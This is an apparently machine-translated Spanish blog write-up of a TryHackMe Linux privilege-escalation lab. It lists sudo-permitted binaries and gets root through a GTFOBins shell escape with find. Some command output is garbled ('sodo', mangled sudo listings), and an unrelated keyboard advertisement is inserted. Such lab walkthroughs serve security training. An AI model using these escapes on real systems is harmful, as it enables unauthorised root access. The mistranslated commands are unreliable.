Esta vez, intentaremos escalar privilegios usando "GTFOBins".
Para la máquina de destino, usaremos la siguiente sala TryHackMe:
"TryHackMe-Linux PrivEsc: https://tryhackme.com/room/linuxprivesc "

Este artículo es la Parte 3.
Si desea consultar el informe sobre PrivEsc en Linux con TryHackMe, consulte también Escalada de privilegios mediante permisos de archivos débiles en Linux
- ¡La sensación de escritura nítida exclusiva del sistema capacitivo sin contacto!
- ¡El primer dispositivo inalámbrico de REALFORCE! ¡También disponible con conexión por cable!
- A diferencia del HHKB, la distribución del teclado japonés no tiene peculiaridades y es fácil de usar para cualquiera.
- Equipado con una rueda para el pulgar, ¡el desplazamiento horizontal es muy fácil!
- ¡También tiene un excelente rendimiento de reducción de ruido, lo que lo hace silencioso y cómodo!
- ¡El desplazamiento se puede cambiar entre el modo de alta velocidad y el modo de trinquete!
Preparación
Iniciar la máquina de destino
Primero, inicie la máquina de destino.
Únase a "Tryhackme-Linux PrivSc: https://tryhackme.com/room/linuxprivesc

Si la dirección IP se muestra así, el arranque está bien.

Conexión ssh
Conéctese a la máquina de destino que comenzó a usar SSH.
Como se explicó, está bien siempre que pueda conectarse usando "Usuario: contraseña321".
└─ $ ssh user@10.10.6.35 La autenticidad del host '10 .10.6.35 (10.10.6.35) 'no se puede establecer. DSA Key Fingerprint es SHA256: P2NSSFVYJVK1QE0TSNX5G2H8AAWYRN71JDZ3UEODBMA. Esta clave no se sabe por otros nombres, ¿está seguro de que desea continuar conectando (sí/no/[huella digital])? Sí Advertencia: agregó permanentemente '10 .10.6.35 '(DSA) a la lista de hosts conocidos. User@10.10.6.35's contraseña: Linux Debian 2.6.32-5-amd64 #1 SMP martes 13 de mayo 16:34:35 UTC 2014 x86_64 Los programas incluidos con el sistema GNU/Linux Debian son software gratuito; Los términos de distribución exactos para cada programa se describen en los archivos individuales en/usr/share/doc/*/copyright. Debian GNU/Linux no tiene absolutamente ninguna garantía, en la medida permitida por la ley aplicable. Último inicio de sesión: viernes 15 de mayo 06:41:23 2020 desde 192.168.1.125 Usuario@Debian: ~ $ sudo -l Entradas predeterminadas de coincidencia para el usuario en este host: env_reset, env_keep+= ld_preload, env_ senck+= ld_library_pathEs posible que necesite agregar "-oHostKeyAlgorithms=+ssh-rsa"
Escalada de privilegios mediante GTFOBins
Ahora intentemos la escalada de privilegios usando GTFOBins
¿Cuántos programas puede ejecutar el “usuario” a través de sudo?
Primero, obtengamos los programas que el usuario puede ejecutar con sodo.
El comando es "sodo -l".
Usuario@Debian: ~ $ sudo -l Entradas de default de coincidencia para el usuario en este host: Env_Reset, Env_Keep+= LD_PReload, Env_Keep+= LD_Library_Path User User puede ejecutar los siguientes comandos en este host: (root) Nopasswd:/usr/sbin/iftop (root) nopasswd:/usr/bin/find (root (root) no /usr/bin/nano (root) nopasswd:/usr/bin/vim (root) nopasswd:/usr/bin/man (root) nopasswd:/usr/bin/awk (root) nopasswd:/usr/bin/menos (root) nopasswd:/usr/bin/ftp (root) nopasswd: nMaP/bin/bin) (root) nopasswd:/usr/sbin/apache2 (root) nopasswd:/bin/másResulta que los 11 programas anteriores se pueden ejecutar con sodo

Un programa de la lista no tiene una secuencia de escape de shell en GTFOBins. ¿Cuál es?
A continuación, busque programas que no tengan una secuencia de escape de shell.
(De hecho, debería buscar programas que sí la tengan).
Cuando los busqué uno por uno, sólo faltaba "apache2"

La respuesta es "apache2"

Intente aumentar los privilegios usando GTFOBins
Ahora, intentemos elevar los privilegios.
Debería ser posible hacerlo con cualquiera de los comandos mencionados, excepto con "apache2". Esta vez, lo intentaremos con "find".
Primero, busquemos Sodo usando buscar

Parece que es solo cuestión de ejecutar el comando, así que intentaré ejecutarlo para implementarlo.

usuario@debian:~$ sudo find . -exec /bin/sh \; -quit sh-4.1# quién soy rootPude confirmar que sí pude elevar mis privilegios a root.
Es muy sencillo... ¿De verdad es así de fácil?
resumen
Esta vez, intenté escalar privilegios usando "GTFOBins".
Fue un poco decepcionante lo fácil que fue escalarlos, pero parece que podría ser útil.
Referencias y sitios
Medio ( Shamsher khan ): https://infosecwriteups.com/linux-privesc-tryhackme-writeup-bf4e32460ee5

![[Tryhackme] Mejora del privilegio usando gtfobins! Linux Privesc WRITEPU PARTE 3](https://hack-lab-256.com/wp-content/uploads/2023/03/hack-lab-256-samnail-9.jpg)